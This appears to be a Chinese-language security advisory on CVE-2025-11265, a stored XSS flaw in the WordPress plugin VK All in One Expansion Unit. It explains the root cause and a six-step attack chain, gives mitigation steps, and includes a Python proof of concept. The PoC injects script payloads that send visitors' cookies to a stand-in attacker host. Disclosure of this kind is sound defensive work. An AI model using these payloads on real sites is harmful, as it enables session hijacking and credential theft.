CVE-2025-11265 VK All in One Expansion Unit 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11265

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

VK All in One Expansion Unit (WordPress插件)

漏洞概述

VK All in One Expansion Unit是WordPress平台上广受欢迎的综合性扩展插件，提供SEO优化、社交分享、网站加速等多种功能。该插件在WordPress所有版本中默认预装，是日本使用最广泛的WordPress插件之一。CVE-2025-11265漏洞存在于该插件的CTA（Call To Action，行动号召）功能模块中，由于保存函数存在逻辑错误，导致安全过滤机制失效。攻击者可通过构造恶意脚本代码，利用vkExUnit_cta_url和vkExUnit_cta_button_text参数注入存储型XSS payload。由于是存储型XSS，恶意脚本会永久保存在数据库中，所有访问受影响页面的用户都会执行攻击者植入的JavaScript代码，可能导致会话劫持、凭据窃取、恶意重定向等严重后果。鉴于该插件的高装机量和广泛使用范围，此漏洞对大量WordPress网站构成中等程度的安全威胁。

技术细节

漏洞根源在于VK All in One Expansion Unit插件的CTA保存函数中存在变量引用错误。在文件inc/call-to-action/package/class-vk-call-to-action.php的第198行以及inc/call-to-action/package/block/index.php的第259和271行，代码本应从$custom_field_options变量读取sanitization callbacks（消毒回调函数），但实际却错误地从$custom_field_name变量读取。由于$custom_field_name通常只包含字段名称字符串而非回调函数数组，导致sanitization callbacks永远无法被正确调用和执行。攻击者只需拥有WordPress Contributor（贡献者）级别权限即可利用此漏洞，通过编辑CTA设置时在vkExUnit_cta_url和vkExUnit_cta_button_text参数中注入JavaScript代码。由于输入未被消毒处理直接存入数据库，形成存储型XSS。当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本，实现会话劫持、凭据窃取、网页篡改等攻击。漏洞影响版本为9.112.1及以下所有版本。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的VK All in One Expansion Unit插件版本，确认版本≤9.112.1以确定漏洞存在

STEP 2

步骤2: 账户获取

攻击者获取目标WordPress网站的Contributor级别账户，可以通过社会工程学、凭据填充或利用其他漏洞获取

STEP 3

步骤3: 构造恶意请求

攻击者登录后台后，访问CTA设置页面，构造包含XSS payload的请求，在vkExUnit_cta_url或vkExUnit_cta_button_text参数中注入恶意JavaScript代码

STEP 4

步骤4: 漏洞利用

由于CTA保存函数的逻辑错误，恶意代码绕过sanitization直接存入数据库，形成存储型XSS

STEP 5

步骤5: 触发攻击

当管理员或其他用户访问包含恶意CTA的页面时，浏览器自动执行注入的JavaScript代码

STEP 6

步骤6: 达成攻击目的

通过执行的JavaScript，攻击者可窃取用户会话cookie、凭据，进行网页篡改或重定向用户到恶意网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11265 PoC - VK All in One Expansion Unit Stored XSS
# Requires Contributor-level access to WordPress

import requests
import re

target_url = "http://target-wordpress-site.com"
username = "attacker_contributor"
password = "attacker_password"

# Step 1: Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/admin.php?page=vkExUnit_general",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Inject XSS payload via CTA settings
# Vulnerable parameters: vkExUnit_cta_url and vkExUnit_cta_button_text
cta_settings_url = f"{target_url}/wp-admin/admin.php?page=vkExUnit_general"
xss_payload_url = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
xss_payload_button = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'

cta_data = {
    "vkExUnit_cta_url": xss_payload_url,
    "vkExUnit_cta_button_text": xss_payload_button,
    "vkExUnit_cta_nonce": "",  # Need to extract from page
    "action": "vkExUnit_cta_save",
    "_wpnonce": ""
}

# Note: This PoC demonstrates the vulnerability concept
# Actual exploitation requires proper nonce extraction and request construction
# The injected script will execute when any user visits pages containing the CTA

影响范围

VK All in One Expansion Unit ≤ 9.112.1 (所有版本)

防御指南

临时缓解措施

临时缓解措施：在无法立即升级插件的情况下，可通过以下方式降低风险：1) 临时禁用或移除插件的CTA功能模块；2) 审查所有具有Contributor及以上权限的用户账户，移除不必要的账户；3) 在Web服务器层面配置XSS防护规则；4) 限制wp-admin访问，仅允许受信任的IP地址访问后台管理界面；5) 启用WordPress安全插件如Wordfence进行实时防护和威胁检测。